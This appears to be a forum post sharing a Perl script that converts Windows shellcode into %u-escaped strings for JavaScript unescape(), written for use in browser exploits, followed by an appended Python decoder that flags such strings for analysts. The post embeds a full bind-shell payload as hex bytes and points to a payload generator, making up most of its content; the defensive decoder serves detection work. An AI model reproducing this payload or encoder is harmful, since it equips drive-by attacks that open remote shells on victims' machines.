With all of the recent browser exploits, I wanted an easy way to encode my shellcode. Now this is not polished by any means, and I took the function that encodes it (so don't give me any credit). It was actually developed by Aviv Raff and H D Moore from the Mozilla_Compareto exploit.

Some improvements I would like to make are to clean up the encoded shellcode output a little and to read the shellcode from a file. As it stands now, you have to copy your shellcode into the Perl script as a var.

So to do this, write your shellcode or just go to
http://metasploit.com:55555/PAYLOADS
and pick the payload you want to use. Paste it into the Perl script. (The example below is a w32_Bind payload.)

#! /usr/local/bin/perl
use strict;

# Paste your shellcode below
my $shellcode =
"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7f".
"\x3c\x79\x76\x83\xeb\xfc\xe2\xf4\x97\x6a\x79\x76\x7f\x6f\x2c\x20".
"\x28\xb7\x15\x52\x67\xb7\x3c\x4a\xf4\x68\x7c\x0e\x7e\xd6\xf2\x3c".
"\x67\xb7\x23\x56\x7e\xd7\x9a\x44\x36\xb7\x4d\xfd\x7e\xd2\x48\x89".
"\x83\x0d\xb9\xda\x47\xdc\x0d\x71\xbe\xf3\x74\x77\xb8\xd7\x8b\x4d".
"\x03\x18\x6d\x03\x9e\xb7\x23\x52\x7e\xd7\x1f\xfd\x73\x77\xf2\x2c".
"\x63\x3d\x92\xfd\x7b\xb7\x78\x9e\x94\x3e\x48\xb6\x20\x62\x24\x2d".
"\xbd\x34\x79\x28\x15\x0c\x20\x12\xf4\x25\xf2\x2d\x73\xb7\x22\x6a".
"\xf4\x27\xf2\x2d\x77\x6f\x11\xf8\x31\x32\x95\x89\xa9\xb5\xbe\xf7".
"\x93\x3c\x78\x76\x7f\x6b\x2f\x25\xf6\xd9\x91\x51\x7f\x3c\x79\xe6".
"\x7e\x3c\x79\xc0\x66\x24\x9e\xd2\x66\x4c\x90\x93\x36\xba\x30\xd2".
"\x65\x4c\xbe\xd2\xd2\x12\x90\xaf\x76\xc9\xd4\xbd\x92\xc0\x42\x21".
"\x2c\x0e\x26\x45\x4d\x3c\x22\xfb\x34\x1c\x28\x89\xa8\xb5\xa6\xff".
"\xbc\xb1\x0c\x62\x15\x3b\x20\x27\x2c\xc3\x4d\xf9\x80\x69\x7d\x2f".
"\xf6\x38\xf7\x94\x8d\x17\x5e\x22\x80\x0b\x86\x23\x4f\x0d\xb9\x26".
"\x2f\x6c\x29\x36\x2f\x7c\x29\x89\x2a\x10\xf0\xb1\x4e\xe7\x2a\x25".
"\x17\x3e\x79\x67\x23\xb5\x99\x1c\x6f\x6c\x2e\x89\x2a\x18\x2a\x21".
"\x80\x69\x51\x25\x2b\x6b\x86\x23\x5f\xb5\xbe\xf7\x93\x3c\x69\x76".
"\x7f\xb5\x9a\x1c\x7f\x54\x79\x66\x7f\x3c\x2a\x21\x80\x69\x61\xf7".
"\x93\x3c\x7d\x76\x7f\xc3\xaa\x76";

JSUnescape($shellcode);

sub JSUnescape # Taken from Mozilla_Compareto by Aviv Raff and H D Moore
{
    my $data = shift;
    my $code = '';

    # Encode the shellcode via %u sequences for JS's unescape() function.
    # Bytes are consumed in pairs and written swapped; an odd final byte is skipped.
    my $idx = 0;
    while ($idx < length($data) - 1) {
        my $c1 = ord(substr($data, $idx, 1));
        my $c2 = ord(substr($data, $idx+1, 1));
        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
        $idx += 2;
    }

    print "\n" . $code . "\n";
}

Output should look like the following. All ready for unescape()!

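
For the analyst's side of this encoding, the following added example (not from the original post or the Mozilla_Compareto exploit) decodes %u sequences back to raw bytes and flags long runs of them in page source. The sample input, the function names and the eight-unit threshold are assumptions made for illustration.

```python
import re

# Constructed sample: page source with a %u string split across a JS
# concatenation, plus a short, ordinary %u escape that should not be flagged.
SAMPLE = '''
var label = unescape("caf%u00e9");
var blob = unescape("%u4241%u4443%u4645" + "%u4847%u4a49%u4c4b%u4e4d%u504f");
'''

UNIT = re.compile(r"%u([0-9a-fA-F]{4})")
JOIN = re.compile(r"""["']\s*\+\s*["']""")  # "..." + "..." string splits


def decode_u_escapes(text):
    """Turn %uXXXX units back into bytes, undoing the encoder's pair swap."""
    out = bytearray()
    for match in UNIT.finditer(text):
        # %u4241 is code unit 0x4241, stored little-endian: 0x41 then 0x42.
        out += int(match.group(1), 16).to_bytes(2, "little")
    return bytes(out)


def find_u_runs(source, min_units=8):
    """Return (unit_count, decoded_bytes) for each run of >= min_units units.

    min_units=8 is an assumed triage threshold, not a value from the post.
    """
    joined = JOIN.sub("", source)  # rejoin literals split with "+"
    run = re.compile(r"(?:%u[0-9a-fA-F]{4}){" + str(min_units) + r",}")
    return [(len(m.group(0)) // 6, decode_u_escapes(m.group(0)))
            for m in run.finditer(joined)]


if __name__ == "__main__":
    for count, raw in find_u_runs(SAMPLE):
        print(f"{count} units -> {len(raw)} bytes: {raw.hex()}")
```

The decoded bytes can then be hashed or handed to a disassembler or signature scanner, which cannot match the payload while it is still in %u form.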